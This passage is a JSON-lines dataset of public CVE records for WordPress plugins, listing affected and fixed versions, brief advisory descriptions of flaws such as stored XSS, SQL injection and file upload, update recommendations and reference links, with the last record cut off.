{"CVE_ID":"CVE-2024-9892","slug":"add-widget-after-content","versionImpact":"2.4.6","versionEndExcluding":"2.5","description":"The Add Widget After Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e02472a8-5b88-43ad-86f3-e890b49899ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e02472a8-5b88-43ad-86f3-e890b49899ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-widget-after-content\\\/trunk\\\/add-widget-after-content-admin.php#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-widget-after-content\\\/trunk\\\/add-widget-after-content-admin.php#L320\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8804","slug":"simple-embed-code","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Code Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's script embed functionality in all versions up to, and including, 2.4 due to insufficient restrictions on who can utilize the functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab4149e1-8378-4007-bbf2-1ac3c479e7ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab4149e1-8378-4007-bbf2-1ac3c479e7ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162219%40simple-embed-code&new=3162219%40simple-embed-code&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162219%40simple-embed-code&new=3162219%40simple-embed-code&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3103","slug":"elementor_widget_clever_radio_player","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The CLEVER - HTML5 Radio Player With History - Shoutcast and Icecast - Elementor Widget Addon plugin for WordPress is vulnerable to arbitrary file read due to insufficient file path validation in the 'history.php' file in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to read arbitrary files on the affected site's server, which may contain sensitive information including database credentials. The vulnerability was partially patched in version 2.4.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/clever-html5-radio-player-with-history-shoutcast-and-icecast-elementor-widget-addon\\\/26708087#item-description__updates-release-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/clever-html5-radio-player-with-history-shoutcast-and-icecast-elementor-widget-addon\\\/26708087#item-description__updates-release-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0733261f-a2e1-4bd1-a57d-fdaaa8c904db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0733261f-a2e1-4bd1-a57d-fdaaa8c904db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45067","slug":"wp-simple-html-sitemap","versionImpact":"2.4","versionEndExcluding":"2.5","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <=\u00a02.1 versions.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0274","slug":"url-params","versionEndExcluding":"2.5","description":"The URL Params WordPress plugin before 2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f6197b6-6d4c-4986-b54c-453b17e94812\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f6197b6-6d4c-4986-b54c-453b17e94812\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7573","slug":"relevanssi-live-ajax-search","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Relevanssi Live Ajax Search plugin for WordPress is vulnerable to argument injection in all versions up to, and including, 2.4. This is due to insufficient validation of input supplied via POST data in the 'search' function. This makes it possible for unauthenticated attackers to inject arbitrary arguments into a WP_Query query and potentially expose sensitive information such as attachments or private posts.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135074\\\/relevanssi-live-ajax-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135074\\\/relevanssi-live-ajax-search\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1122","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its Giveaways options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71f5d630-2726-48c7-b9e5-7bebc786b561\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71f5d630-2726-48c7-b9e5-7bebc786b561\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1121","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ead9fb9-d81f-47c6-a1b4-21f29183cc15\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ead9fb9-d81f-47c6-a1b4-21f29183cc15\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1120","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2defd30-7e4c-4a28-8a68-282429061f3f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2defd30-7e4c-4a28-8a68-282429061f3f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3961","slug":"convertkit","versionImpact":"2.4.9","versionEndExcluding":"2.4.9.1","description":"The ConvertKit \u2013 Email Newsletter, Email Marketing, Subscribers and Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tag_subscriber function in all versions up to, and including, 2.4.9. This makes it possible for unauthenticated attackers to subscribe users to tags. Financial damages may occur to site owners if their API quota is exceeded.","recommendation":"Update to version 2.4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79d828b8-aea2-4705-ae23-ac70133a6c3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79d828b8-aea2-4705-ae23-ac70133a6c3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104932%40convertkit%2Ftrunk&old=3085997%40convertkit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104932%40convertkit%2Ftrunk&old=3085997%40convertkit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2790","slug":"ht-mega-for-elementor","versionImpact":"2.4.8","versionEndExcluding":"2.4.9","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Accordion widget in all versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52ba91f1-21a2-4d7c-8801-b5e72a00c37d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52ba91f1-21a2-4d7c-8801-b5e72a00c37d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3063395%40ht-mega-for-elementor&new=3063395%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3063395%40ht-mega-for-elementor&new=3063395%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6558","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.4.8","versionEndExcluding":"2.4.9","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'upload_import_file' function in versions up to, and including, 2.4.8. This makes it possible for authenticated attackers with shop manager-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55b3e2dc-dc4f-408b-bbc6-da72ed5ad245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55b3e2dc-dc4f-408b-bbc6-da72ed5ad245?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.7\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.7\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008454\\\/users-customers-import-export-for-wp-woocommerce#file197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008454\\\/users-customers-import-export-for-wp-woocommerce#file197\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8420","slug":"dhvc-form","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"The DHVC Form plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.4.7. This is due to the plugin allowing a user to supply the 'role' field when registering. This makes it possible for unauthenticated attackers to register as an administrator on sites.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/dhvc-form-wordpress-form-for-visual-composer\\\/8326593\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/dhvc-form-wordpress-form-for-visual-composer\\\/8326593\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d51a0c-c625-4732-b345-df02971fbffa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d51a0c-c625-4732-b345-df02971fbffa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24548","slug":"autoglot","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Autoglot Autoglot \u2013 Automatic WordPress Translation allows Reflected XSS. This issue affects Autoglot \u2013 Automatic WordPress Translation: from n\/a through 2.4.7.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/autoglot\\\/vulnerability\\\/wordpress-autoglot-automatic-wordpress-translation-plugin-2-4-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/autoglot\\\/vulnerability\\\/wordpress-autoglot-automatic-wordpress-translation-plugin-2-4-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6723","slug":"ai-engine","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"The AI Engine WordPress plugin before 2.4.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when viewing chatbot discussions.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbd2152e-0aa1-4b56-a6a3-2e6ec78e08a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbd2152e-0aa1-4b56-a6a3-2e6ec78e08a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6843","slug":"easyjobs","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg WordPress plugin before 2.4.7 does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41508340-8caf-4dca-bd88-350b63b78ab0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41508340-8caf-4dca-bd88-350b63b78ab0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12160","slug":"seraphinite-discount-for-woocommerce","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Seraphinite Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-discount-for-woocommerce\\\/trunk\\\/Cmn\\\/Plugin.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-discount-for-woocommerce\\\/trunk\\\/Cmn\\\/Plugin.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206551%40seraphinite-discount-for-woocommerce&new=3206551%40seraphinite-discount-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206551%40seraphinite-discount-for-woocommerce&new=3206551%40seraphinite-discount-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd748b6c-110a-46b6-a609-64d093dfc3e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd748b6c-110a-46b6-a609-64d093dfc3e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3470","slug":"poll-wp","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The TS Poll \u2013 Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the s parameter in all versions up to, and including, 2.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-wp\\\/tags\\\/2.4.6\\\/admin\\\/class-ts_poll_list.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-wp\\\/tags\\\/2.4.6\\\/admin\\\/class-ts_poll_list.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2dab05-97ce-4f53-8069-2577c5c25b16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2dab05-97ce-4f53-8069-2577c5c25b16?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12921","slug":"ethereumico","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The EthereumICO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ethereum-ico shortcode in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230122\\\/ethereumico\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230122\\\/ethereumico\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d964c99c-6ab6-453c-969f-66d5cd00dc8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d964c99c-6ab6-453c-969f-66d5cd00dc8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2085","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' value in several widgets all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9c5bed-a399-43e2-be40-d669e90d3736?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9c5bed-a399-43e2-be40-d669e90d3736?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_accordion.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2084","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's lightbox widget in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e5417d3-c466-4caf-9fb6-26d6e2c06fe1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e5417d3-c466-4caf-9fb6-26d6e2c06fe1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0823","slug":"cookie-notice","versionEndExcluding":"2.4.7","description":"The Cookie Notice & Compliance for GDPR \/ CCPA WordPress plugin before 2.4.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83f23a9f-9ace-47d2-a5f3-a4915129b16c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83f23a9f-9ace-47d2-a5f3-a4915129b16c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8488","slug":"header-footer-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_hfe_compatibility_option_callback ()function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the compatibility option setting.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.6\\\/admin\\\/class-hfe-addons-actions.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.6\\\/admin\\\/class-hfe-addons-actions.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.7\\\/admin\\\/class-hfe-addons-actions.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.7\\\/admin\\\/class-hfe-addons-actions.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b847b5-9deb-41c4-b976-725249e0098e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b847b5-9deb-41c4-b976-725249e0098e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6214","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.6 via the purchased_products function. This makes it possible for unauthenticatied attackers to extract sensitive data including the previous 7 days of order data including products and customer PII.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54043c6a-48a1-48e8-ba61-a7e8a1773036?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54043c6a-48a1-48e8-ba61-a7e8a1773036?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.3.6\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.3.6\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php?old=2654447&old_path=ht-mega-for-elementor%2Ftrunk%2Fextensions%2Fwc-sales-notification%2Fclasses%2Fclass.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php?old=2654447&old_path=ht-mega-for-elementor%2Ftrunk%2Fextensions%2Fwc-sales-notification%2Fclasses%2Fclass.sale_notification.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3472","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.4.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes when WooCommerce is also installed and activated.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/shortcodes\\\/shortcodes.php#L618\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/shortcodes\\\/shortcodes.php#L618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74428e76-1946-408f-8adc-24ab4b7e46c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74428e76-1946-408f-8adc-24ab4b7e46c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3458","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ocean_gallery_id\u2019 parameter in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The Classic Editor plugin must be installed and activated to exploit the vulnerability.","recommendation":"Update to version 2.4.7, or a newer patched 